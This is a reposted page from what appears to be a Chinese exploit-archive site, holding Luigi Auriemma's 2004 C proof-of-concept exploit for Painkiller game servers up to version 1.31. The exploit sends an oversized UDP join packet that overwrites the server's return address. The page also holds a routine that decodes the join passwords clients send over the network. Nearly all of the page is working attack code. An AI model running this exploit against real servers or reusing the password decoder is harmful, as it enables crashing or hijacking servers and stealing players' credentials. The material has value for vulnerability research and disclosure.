首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Painkiller <= 1.31 code execution exploit
来源:http://aluigi.altervista.org 作者:Luigi 发布时间:2004-08-27  

Painkiller <= 1.31 code execution exploit


/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define VER "0.1"
#define BUFFSZ 2048
#define PORT 3455
#define TIMEOUT 3
#define GAMEVER "1.3"
#define INFO "\xfe\xfd\x00\xDE\xAD\xC0\xDE\xff\xff\xff"
#define CONN "\xff\xff\xff\xff\x02"
#define JOIN1 "\xff\xff\xff\xff\x04" \
GAMEVER "\0" \
"105.263" "\0"
#define JOIN2 "\x00\x00\x00\x00" "\xde\xad\xc0\xde"
#define BOOMSZ 548
#define RETBACKOFF 28

#define SENDRECV(x) \
if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) \
< 0) std_err(); \
if(timeout(sd) < 0) { \
fputs("\nError: socket timeout, no answer received\n", stdout); \
exit(1); \
} \
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err(); \
buff[len] = 0x00;


void show_info(u_char *buff, int len);
u_long check_ret_addr(char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);


int main(int argc, char *argv[]) {
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ + 1],
*ptr;
struct sockaddr_in peer;
u_long ret_addr;


setbuf(stdout, NULL);

fputs("\n"
"Painkiller <= 1.31 code execution bug "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s <ret_addr> <host> [port(%d)]\n"
"\n"
" ret_addr is a memory address where you want to point the code flow.\n"
" I have implemented only the ret_addr of the dedicated server because the\n"
" normal game needs a different one, so the dedicated server crashs but you can\n"
" also choose a return address (EIP) while the normal game simply crashs.\n"
" ret_addr is automatically verified by this PoC because only the bytes from\n"
" 0x00 to 0x3f are allowed.\n"
" If you don't know what to use, insert: 0x32103210 or 0x33333333\n"
" Some addresses like 0x11111111 instead freeze the server with CPU at 100%%\n"
"\n", argv[0], PORT);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

ret_addr = check_ret_addr(argv[1]);

if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("\n"
"- Target %s:%hu\n"
"- Real return address: %s\n"
"- Encoded return address: 0x%08lx\n",
inet_ntoa(peer.sin_addr),
port,
argv[1],
ret_addr);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

fputs("- Request informations:\n", stdout);
SENDRECV(INFO);
show_info(buff, len);

fputs("- Send connection request packet\n", stdout);
SENDRECV(CONN);
printf("- Server challenge: %s\n", buff + 5);

ptr = (u_char *)memcpy(buff, JOIN1, sizeof(JOIN1) - 1) +
sizeof(JOIN1) - 1;

ptr = (u_char *)memset(ptr, '0', 72) + 72; // Gamespy key auth
*ptr++ = 0x00; // key auth delimiter

ptr = (u_char *)memset(ptr, 'a', BOOMSZ) + BOOMSZ;
*(u_long *)(ptr - RETBACKOFF) = ret_addr; // dedicated server ret_addr
*ptr++ = 0x00; // password delimiter

ptr = (u_char *)memcpy(ptr, JOIN2, sizeof(JOIN2) - 1) +
sizeof(JOIN2) - 1;

fputs("- Send BOOM packet with return address overwriting\n", stdout);
if(sendto(sd, buff, ptr - buff, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
}

close(sd);

return(0);
}


void show_info(u_char *buff, int len) {
u_char *p1,
*p2,
*limit;
int nt = 0;

limit = buff + len;
p1 = buff + 5;
while(p1 < limit) {
p2 = strchr(p1, 0x00);
if(!p2) break;
*p2 = 0x00;

if(!nt) {
if(p1 == p2) break;
printf("%30s: ", p1);
nt++;
} else {
printf("%s\n", p1);
nt = 0;
}
p1 = p2 + 1;
}
fputc('\n', stdout);
}

u_long check_ret_addr(char *data) {
u_long ret = 0;
u_char *retc;
int tmp,
i;

retc = ((u_char *)&ret) + 3;

if((data[1] == 'x') || (data[1] == 'X')) data += 2;

if(strlen(data) != 8) {
fputs("\n"
"Error: please use a full offset of 4 hex numbers.\n"
" For example: 0x12341234, 12341234, 00001234, 0x33333333 and so on\n"
"\n", stdout);
exit(1);
}

for(i = 0; i < 4; i++) {
sscanf(data, "%02x", &tmp);
if(tmp > 0x3f) {
printf("\n"
"Error: the return address cannot contain bytes greater than 0x3f (your: 0x%02x).\n"
" For example 0x12341234 contains 0x12, 0x34, 0x12 and 0x34 that are ok.\n"
" While 0x12345678 is not ok because 0x56 and 0x78 are greater than 0x3f\n"
"\n", tmp);
exit(1);
}
if(tmp <= 9) {
*retc = tmp + 0x30;
} else if((tmp >= 0xa) && (tmp <= 0x23)) {
*retc = tmp + 0x57;
} else {
*retc = tmp + 0x1d;
}
retc--;
data += 2;
}

return(ret);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}


#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif


================================================================================================

/*

Painkiller packet's password encoder/decoder 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web: http://aluigi.altervista.org


INTRODUCTION
============
When you want to join a password protected game server of Painkiller
(http://www.painkillergame.com) your client sends a packet containing
the packet ID (0x04), your client version, the 72 bytes of the Gamespy
auth key (http://aluigi.altervista.org/papers/gskey-auth.txt) plus a
"strange" text string after it.
This text string is just the password you have used to join and it is
encrypted using the other text string (the server challenge) sent by
the server in its previous packet.
My optimized algorithm is able to decode/encode the password stored in
the packet sent by the client.


HOW TO USE
==========
The function is an algorithm used for both encoding and decoding
without differences.
It needs only 2 parameters:
- pwd: the client's password stored in the packet
- enc: the server challenge string

Example:
#include "painkiller_pckpwd.h"

unsigned char pwd[] = "5mjblOpV8N",
enc[] = "k7bEv4cGcw";
painkiller_pckpwd(pwd, enc);
printf("Password: %s\n", pwd); // the password is "mypassword"


LICENSE
=======
Copyright 2004 Luigi Auriemma

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

http://www.gnu.org/licenses/gpl.txt

*/

void painkiller_pckpwd(unsigned char *pwd, unsigned char *enc) {
unsigned char buff[64],
encbuff[64],
*p1,
*p2;
int len,
i,
cl,
dl,
esi,
edi;

p1 = pwd;
while(1) {
if((*p1 >= '0') && (*p1 <= '9')) {
*p1 -= 0x30;
} else if((*p1 >= 'a') && (*p1 <= 'z')) {
*p1 -= 0x57;
} else if((*p1 >= 'A') && (*p1 <= '\\')) {
*p1 -= 0x1d;
} else {
break;
}
p1++;
}
len = p1 - pwd;

p1 = buff;
for(i = 0; i < 64; i++) {
*p1++ = i;
}

p1 = enc;
p2 = encbuff;
for(i = 0; i < 64; i++) {
*p2++ = *p1++;
if(!*p1) p1 = enc;
}

p1 = buff;
p2 = encbuff;
for(i = esi = 0; i < 64; i++) {
cl = *p1;
esi = (*p2 + cl + esi) & 63;
*p1++ = buff[esi];
buff[esi] = cl;
p2++;
}

esi = edi = 0;
p1 = pwd;
for(i = 0; i < len; i++) {
esi = (esi + 1) & 63;
cl = buff[esi];
edi = (cl + edi) & 63;
dl = buff[edi];
buff[esi] = dl;
buff[edi] = cl;
*p1++ ^= buff[(dl + cl) & 63];
}

p1 = pwd;
while(len--) {
if(*p1 <= 9) {
*p1 += 0x30;
} else if((*p1 >= 0xa) && (*p1 <= 0x23)) {
*p1 += 0x57;
} else {
*p1 += 0x1d;
}
p1++;
}
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Gaucho Email Client Buffer Ove
·NtRegmon Local Denial of Servi
·Winamp<=5.04Skin File Remot
·Citadel/UX Remote Buffer Overf
·Squirrelmail chpasswd local Ro
·Ground Control<= 1.0.0.7 se
·Axis Network Camera/Video Serv
·MusicDaemon<= 0.0.3 v2 Remo
·Remote Exploit for Hafiye-1.0
·D-Link DCS-900 camera Remote E
·Bird Chat 1.61 Denial Of Servi
·TiTan FTP Server Long Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved